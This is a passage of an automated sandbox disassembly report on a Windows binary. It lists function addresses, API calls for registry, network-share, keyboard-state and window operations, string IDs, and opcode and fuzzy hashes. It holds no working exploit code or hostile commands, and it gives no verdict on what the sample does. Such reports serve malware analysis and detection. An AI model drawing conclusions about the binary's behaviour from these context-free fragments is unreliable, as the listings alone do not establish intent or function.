                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00413F97: __wtof_l.LIBCMT ref: 00413FA1
                                                                                                                                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004584BA
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: FromQueryStringValue_wcslen$CloseFreeLoadOpenTaskType__wtof_l_wcscpy
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Version$\TypeLib$interface\
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 656856066-939221531
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 73379605cfaaf105ee685c6daddaf2c4824f5dc828714578f474d0d05c7db838
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19513B715083059BD310EF55D944A6FB3E8FFC8B08F004A2DF985A7251EA78DD09CB9A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045E62E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 155COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E676
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E69A
                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 0045E6EE
                                                                                                                                                                                                                                                                                                                                                                                                                • _printf.LIBCMT ref: 0045E7A9
                                                                                                                                                                                                                                                                                                                                                                                                                • _printf.LIBCMT ref: 0045E7D2
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: LoadString_printf$__swprintf_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3590180749-2354261254
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 835382aeb01427732dc6b750cf2ba574ed77461063debdd42288bdc21f9728b4
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B051D5715143019BD324FB51CC41EAF77A8AF84354F14093FF94563292DB78AE49CB6A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004580E1 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 136registryshareCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                                                                                                                                                                                • _memset.LIBCMT ref: 00458194
                                                                                                                                                                                                                                                                                                                                                                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004581D6
                                                                                                                                                                                                                                                                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,00000000), ref: 004581F4
                                                                                                                                                                                                                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000000), ref: 00458219
                                                                                                                                                                                                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?), ref: 00458248
                                                                                                                                                                                                                                                                                                                                                                                                                • CLSIDFromString.OLE32(00000000,?), ref: 00458279
                                                                                                                                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0045828F
                                                                                                                                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00458296
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2255324689-22481851
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 0916ae95de1959dc40878de41837780f7e862baf069d4d5c3429810960799c2e
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A4190725083019BD320EF54C845B5FB7E8AF84714F044D2EFA8577291DBB8E949CB9A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004584D6 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 105registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000000,interface,00000000,00020019,?), ref: 00458513
                                                                                                                                                                                                                                                                                                                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00458538
                                                                                                                                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00458615
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,000001FE,interface\), ref: 0045858A
                                                                                                                                                                                                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000028), ref: 004585A8
                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 004585D6
                                                                                                                                                                                                                                                                                                                                                                                                                • IIDFromString.OLE32(?,?,?,?), ref: 004585EB
                                                                                                                                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004585F8
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CloseOpen$EnumFromQueryStringValue__wcsicoll_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ($interface$interface\
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2231185022-3327702407
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 2ed788c9a442d2de66cb2a0eaf665167c450c6ff9570aaff4df7cfaf3afbbce1
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE317271204305ABE710DF54DD85F6BB3E8FB84744F10492DF685A6191EAB8E908C76A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00436582 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 79networkCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • WSAStartup.WSOCK32(00000101,?), ref: 004365A5
                                                                                                                                                                                                                                                                                                                                                                                                                • gethostname.WSOCK32(00000100,00000100,00000101,?), ref: 004365BC
                                                                                                                                                                                                                                                                                                                                                                                                                • gethostbyname.WSOCK32(00000101,00000100,00000100,00000101,?), ref: 004365C6
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 004365F5
                                                                                                                                                                                                                                                                                                                                                                                                                • WSACleanup.WSOCK32 ref: 004365FD
                                                                                                                                                                                                                                                                                                                                                                                                                • inet_ntoa.WSOCK32(00000100,?), ref: 00436624
                                                                                                                                                                                                                                                                                                                                                                                                                • _strcat.LIBCMT ref: 0043662F
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 00436644
                                                                                                                                                                                                                                                                                                                                                                                                                • WSACleanup.WSOCK32(?,?,?,?,?,?,00000100,?), ref: 00436652
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 00436666
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcscpy$Cleanup$Startup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0.0.0.0
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2691793716-3771769585
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 72edaa20f59d4c855ae2a4057bf2e912041bb0bcae33cfe0ba1e7234a9852c49
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 29d249c793a1599df1911ffab6ed89036a29d54f41df1114d8fa63e2d2305339
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 72edaa20f59d4c855ae2a4057bf2e912041bb0bcae33cfe0ba1e7234a9852c49
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C21D4726003016BD620FB269C42FFF33A89FD4318F54492FF64456242EABDD58983AB
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00416B12 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048C968,0000000C,00416C4D,00000000,00000000,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B24
                                                                                                                                                                                                                                                                                                                                                                                                                • __crt_waiting_on_module_handle.LIBCMT ref: 00416B2F
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041177F: Sleep.KERNEL32(000003E8,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 0041178B
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041177F: GetModuleHandleW.KERNEL32(00411739,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00411794
                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00416B58
                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00411739,DecodePointer), ref: 00416B68
                                                                                                                                                                                                                                                                                                                                                                                                                • __lock.LIBCMT ref: 00416B8A
                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedIncrement.KERNEL32(00EA60FF), ref: 00416B97
                                                                                                                                                                                                                                                                                                                                                                                                                • __lock.LIBCMT ref: 00416BAB
                                                                                                                                                                                                                                                                                                                                                                                                                • ___addlocaleref.LIBCMT ref: 00416BC9
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1028249917-2843748187
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: dfb830706c011728ae11a8c0f52cb2fa371409e71f4acd403326aacb15a29bdd
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E119671944701AFD720EF76C905B9EBBE0AF00714F10495FE469A6391DB78A580CB1D
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044920C Relevance: 18.2, APIs: 12, Instructions: 243windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000000,000000FF,?), ref: 0044931D
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0045BBB0,00000000,00000000), ref: 0044932D
                                                                                                                                                                                                                                                                                                                                                                                                                • CharNextW.USER32(?,?,?,?,0045BBB0,00000000,00000000,?,?), ref: 00449361
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449375
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000402,?), ref: 0044941C
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(004A83D8,000000C2,00000001,?), ref: 004494A0
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449515
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$CharNext
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1350042424-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: cf19a455924c4199ae2d31ef2e344bdd2865620a2145bd440d1f5c61272ee54d
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D81B5312083019BE720DF15DC85FBBB7E4EBD9B20F00492EFA54962C0D7B99946D766
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00453B94 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyboardState.USER32(?,?,00000000), ref: 00453C0D
                                                                                                                                                                                                                                                                                                                                                                                                                • SetKeyboardState.USER32(?), ref: 00453C5A
                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00453C82
                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(000000A0), ref: 00453C99
                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00453CC9
                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(000000A1), ref: 00453CDA
                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00453D07
                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000011), ref: 00453D15
                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 00453D3F
                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000012), ref: 00453D4D
                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00453D77
                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(0000005B), ref: 00453D85
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 09d2c23b2f41f951af40c960ff4fa7a39ed3d74d48f5bb091813d5d41b5bf946
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD5108311497C42AF731EF6048217A7BBE45F52782F488D5EE9C107283E619AB0C976B
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00437DB1 Relevance: 18.2, APIs: 12, Instructions: 180COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00437DD7
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00437DE9
                                                                                                                                                                                                                                                                                                                                                                                                                • MoveWindow.USER32(00000000,0000000A,?,?,?,00000000), ref: 00437E5C
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00437E70
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00437E82
                                                                                                                                                                                                                                                                                                                                                                                                                • MoveWindow.USER32(00000000,?,00000000,?,?,00000000), ref: 00437EDB
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00437EEA
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00437EFC
                                                                                                                                                                                                                                                                                                                                                                                                                • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00437F46
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00437F55
                                                                                                                                                                                                                                                                                                                                                                                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 00437F6E
                                                                                                                                                                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00437F78
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
